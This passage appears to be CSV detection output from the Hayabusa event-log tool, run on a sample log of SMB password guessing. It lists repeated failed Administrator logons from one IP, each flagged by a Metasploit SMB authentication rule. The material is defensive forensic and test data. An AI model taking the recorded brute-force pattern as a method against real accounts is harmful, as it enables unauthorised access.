NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
